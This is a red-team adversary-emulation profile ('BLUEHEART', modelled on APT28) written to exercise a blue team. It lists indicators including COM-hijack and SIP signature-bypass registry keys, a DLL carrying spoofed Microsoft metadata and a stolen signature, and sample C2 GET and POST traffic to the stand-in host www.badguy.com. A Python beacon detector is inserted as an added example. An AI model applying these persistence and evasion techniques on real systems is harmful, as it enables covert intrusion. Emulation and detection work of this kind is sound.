Threat Profile (BLUEHEART)
This example can be used as a reference; it is the kind of artifact produced during threat decomposition and threat profile design using MITRE ATT&CK.
Description
BLUEHEART was inspired by APT28 malware, using CobaltStrike malleable C2 profiles, custom metadata, and TTPs.
Goal and Intent
Emulate the TTPs of a realistic adversary to operate on a target network and give a blue team the opportunity to exercise defensive TTPs.
Key IOCs
- User level C2 Agent
- Custom CobaltStrike Malleable C2 profile to mimic CHOPSTICK IOCs
- Persistence: COM Object Hijacking
- File: C:\Users\Public\Libraries\apphelp.dll
- HTTP Traffic to www.badguy.com
- Beacons every 60 seconds with 30% jitter
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
- Modified Date/Time Stamp (Using MetaTwin)
- Custom Binary metadata using valid Microsoft signature
- Modified SubjectInterfacePackage (SIP) for Signature Verification Bypass
Disk Indicators
C:\Users\Public\Libraries\apphelp.dll
Metadata
File: C:\windows\system32\apphelp.dll
InternalName: Apphelp
OriginalFilename: Apphelp
FileVersion: 10.0.10586.0 (rs1_release.151029-1700)
FileDescription: Application Compatibility Client Library
Product: Microsoft® Windows® Operating System
ProductVersion: 10.0.10586.0
Debug: False
Patched: False
PreRelease: False
PrivateBuild: False
SpecialBuild: False
Language: English (United States)
Digital Signature: Stolen from c:\windows\system32\taskhostw.exe
Time Stamp: 10/30/2015 02:17 AM
File Size: 427960
MD5 Hash: A31B0124152CBB60C68DCFEBC9C4909C
Registry Modifications
COM Object Hijack
Key: HKCU:\Software\Classes\CLSID\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\InProcServer32
Property: (Default)
Property: ThreadingModel
SIP Hijack
Key: HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}
Network Indicators
HTTP Traffic C2 commands through www.badguy.com
Sample HTTP GET Request
GET /index.html HTTP/1.1
Accept-Language: en-US,en;q=0.5
Host: www.badguy.com
Proxy-Connection: Keep-Alive
Cookie: session=sE5QGSAMTumuA/3mNmqe5g==
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Server: IIS 5.0
Connection: close
Content-Length: 218
<html><head><meta http-equiv="refresh" content=0 url="http://www.badguy.com"><title>Bad Guy Website</title></html>fylWlO/d4uBN6b0hPlhUDYRcjdjaifkaukstXQZwO3PZpCzTTRFTERSAITNWz2xTNndMcZgPg==
Sample HTTP POST Request
POST /contact HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.badguy.com
Content-Type: application/x-www-form-urlencoded
Cookie: session=NzQ4NTU=
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
action=Submit&data=jdagislaga-p0Zw
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/octet-stream
Server: IIS 5.0
Connection: close
Content-Length: 40
yF8u8YkdbbWNGWm5gUgaalgOOSfZDX2lnQl5qZEF
C2 Overview
HTTP Traffic on TCP port 80 connecting to www.badguy.com every 60 seconds.
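One way to turn the C2 overview above into a detection, as an added Python example that is not part of the original profile: group proxy requests by client and destination host and flag pairs whose inter-request gaps sit inside the 60-second, 30% jitter window, also noting whether the profile's User-Agent is used. The proxy log format, the thresholds MIN_REQUESTS and MATCH_RATIO, and the sample lines are constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime
# Beacon parameters taken from the BLUEHEART profile.
BEACON_INTERVAL = 60.0   # seconds between check-ins
JITTER = 0.30            # 30 % jitter
C2_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
MIN_REQUESTS = 5         # constructed threshold: enough samples to call traffic periodic
MATCH_RATIO = 0.8        # constructed threshold: share of gaps inside the jitter window
# Hypothetical proxy log format: <ISO timestamp> <client> <method> <host> "<user-agent>"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
# Constructed sample log: 10.0.0.5 checks in with www.badguy.com about every
# 60 s (with jitter); the www.example.com lines are ordinary browsing noise.
SAMPLE_LOG = "\n".join([
    f'2015-10-30T02:17:00 10.0.0.5 GET www.badguy.com "{C2_USER_AGENT}"',
    '2015-10-30T02:17:10 10.0.0.7 GET www.example.com "Mozilla/5.0 Firefox/42.0"',
    f'2015-10-30T02:17:52 10.0.0.5 GET www.badguy.com "{C2_USER_AGENT}"',
    f'2015-10-30T02:18:40 10.0.0.5 POST www.badguy.com "{C2_USER_AGENT}"',
    f'2015-10-30T02:19:38 10.0.0.5 GET www.badguy.com "{C2_USER_AGENT}"',
    f'2015-10-30T02:20:25 10.0.0.5 GET www.badguy.com "{C2_USER_AGENT}"',
    f'2015-10-30T02:21:22 10.0.0.5 GET www.badguy.com "{C2_USER_AGENT}"',
    '2015-10-30T02:25:00 10.0.0.7 GET www.example.com "Mozilla/5.0 Firefox/42.0"',
])

def parse_log(text):
    events = []                      # (timestamp, client, host, user-agent)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                 # skip malformed lines instead of failing
        ts, client, _method, host, ua = m.groups()
        events.append((datetime.fromisoformat(ts), client, host, ua))
    return events

def find_beacons(events):
    # Cobalt Strike jitter shortens the sleep by up to JITTER; a symmetric
    # window around the nominal interval keeps the check robust to that.
    low, high = BEACON_INTERVAL * (1 - JITTER), BEACON_INTERVAL * (1 + JITTER)
    by_pair = defaultdict(list)
    for ts, client, host, ua in events:
        by_pair[(client, host)].append((ts, ua))
    hits = {}
    for pair, reqs in by_pair.items():
        if len(reqs) < MIN_REQUESTS:
            continue
        reqs.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        ratio = sum(low <= g <= high for g in gaps) / len(gaps)
        if ratio >= MATCH_RATIO:
            hits[pair] = {"requests": len(reqs), "match_ratio": ratio,
                          "ua_match": all(ua == C2_USER_AGENT for _, ua in reqs)}
    return hits
```

Run `find_beacons(parse_log(SAMPLE_LOG))` to get the flagged (client, host) pairs; against real proxy logs, adjust LINE_RE to the log format in use and tune the thresholds to the environment's baseline.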
TTPs (Enumeration, Delivery, Lateral Movement, Privilege Escalation, etc.)
Post-exploitation via Cobalt Strike commands. Enumeration and lateral movement via Cobalt Strike and native Windows commands. Privilege escalation is limited and is determined post-exploitation.
Exploitation
Nothing specific. The operator deploys after initial access.
Persistence
User-level persistence: a hijacked COM object handler loads the DLL at user logon under taskhostw.exe.
# Friendly name and CLSID of the COM object whose InProcServer32 key is hijacked (see Registry Modifications)
$Description = "SystemSoundsService"
$CLSID = '{2DEA658F-54C1-4227-AF9B-260AB5FC3543}'